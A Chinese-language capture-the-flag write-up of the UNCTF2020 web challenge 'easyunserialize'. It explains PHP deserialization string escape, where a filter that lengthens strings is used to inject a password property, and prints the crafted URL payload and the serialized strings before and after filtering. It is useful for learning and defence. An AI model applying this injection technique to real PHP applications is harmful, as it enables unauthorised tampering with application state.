在做UNCTF2020一道WEB题easyunserialize时遇到了,就记录一下
?很明显可以看到,我们需要进入_wakeup函数的if判断,并让password等于easy
重点:
1._wakeup
这个函数在调用unserialize时会被调用,还有与之类似的_sleep魔术方法,它在使用serialize时被调用。可以看到下面使用unserialize
2.if判断
我们需要更改password的值,但是password是1无法更改。
继续看,filter函数将字符串'challenge'替换为了'easychallenge',多了四个字符,这里就可以利用到PHP反序列化字符逃逸
unserialize函数在分析我们的序列化字符串时,是根据里面的数字来确定变量的大小的
比如:
O:1:"a":2:{s:6:"uname1";i:1;s:9:"password1";i:2;}
unname1 是六个字符,unserialize就是根据6来确定它的长度,而我们在反序列化之前将这串字符串修改了,但是我们的6还没变,就会变成这样:
O:1:"a":2:{s:6:"uname1123123123";i:1;s:9:"password1";i:2;}
unserialize还是只认识那前6个字符,后面的就会正常解析
如果我们把多出来的字符恶意构造成序列化的格式,那不就能修改password了吗
那我们先本地构造一下:
O:1:"a":2:{s:5:"uname";s:1:"1";s:8:"password";s:4:"easy";}
如果password为easy就是这个格式,那我们需要用到的就是uname的值的后面的字符:
";s:8:"password";s:4:"easy";}
这有29个字符,问题来了,我们一个challenge只能多出四个字符,而29不是四的倍数,也就是说我们不能将 我们恶意构造的这29个字符,完全排除在外,使之成为新的属性
那我们多写一点不就好了,那就构造一些没用的参数,让它变成四的倍数:
";s:8:"password";s:4:"easy";s:4:"aaaa";}
这就有了40个字符了,那我们的uname就要传入10个challenge
还有一个问题,我们这样构造,后面多余的部分怎么办?比如:
";s:8:"password";s:4:"easy";s:4:"aaaa";}";s:8:"password";i:1;}
unserialize在碰到第一个大括号时就结束了,后面多的就被舍去了
构造URL:
?1=challengechallengechallengechallengechallengechallengechallengechallengechallengechallenge";s:8:"password";s:4:"easy";s:4:"aaaa";}
替换字符之前:
O:1:"a":2:{s:5:"uname";s:130:"challengechallengechallengechallengechallengechallengechallengechallengechallengechallenge";s:8:"password";s:4:"easy";s:4:"aaaa";}";s:8:"password";i:1;}
替换字符之后:
O:1:"a":2:{s:5:"uname";s:130:"easychallengeeasychallengeeasychallengeeasychallengeeasychallengeeasychallengeeasychallengeeasychallengeeasychallengeeasychallenge";s:8:"password";s:4:"easy";s:4:"aaaa";}";s:8:"password";i:1;}
可以看到替换后长度130并没有变化,而多出来了40个字符,这40个字符的长度正好包含:
";s:8:"password";s:4:"easy";s:4:"aaaa";}
它们就会当做正常的属性解析,从而在反序列化之后,将我们的password改掉了,执行了_wakeup魔术方法,得到flag
?
新手第一次分享自己的思路,希望大佬们能指出自己的错误qwq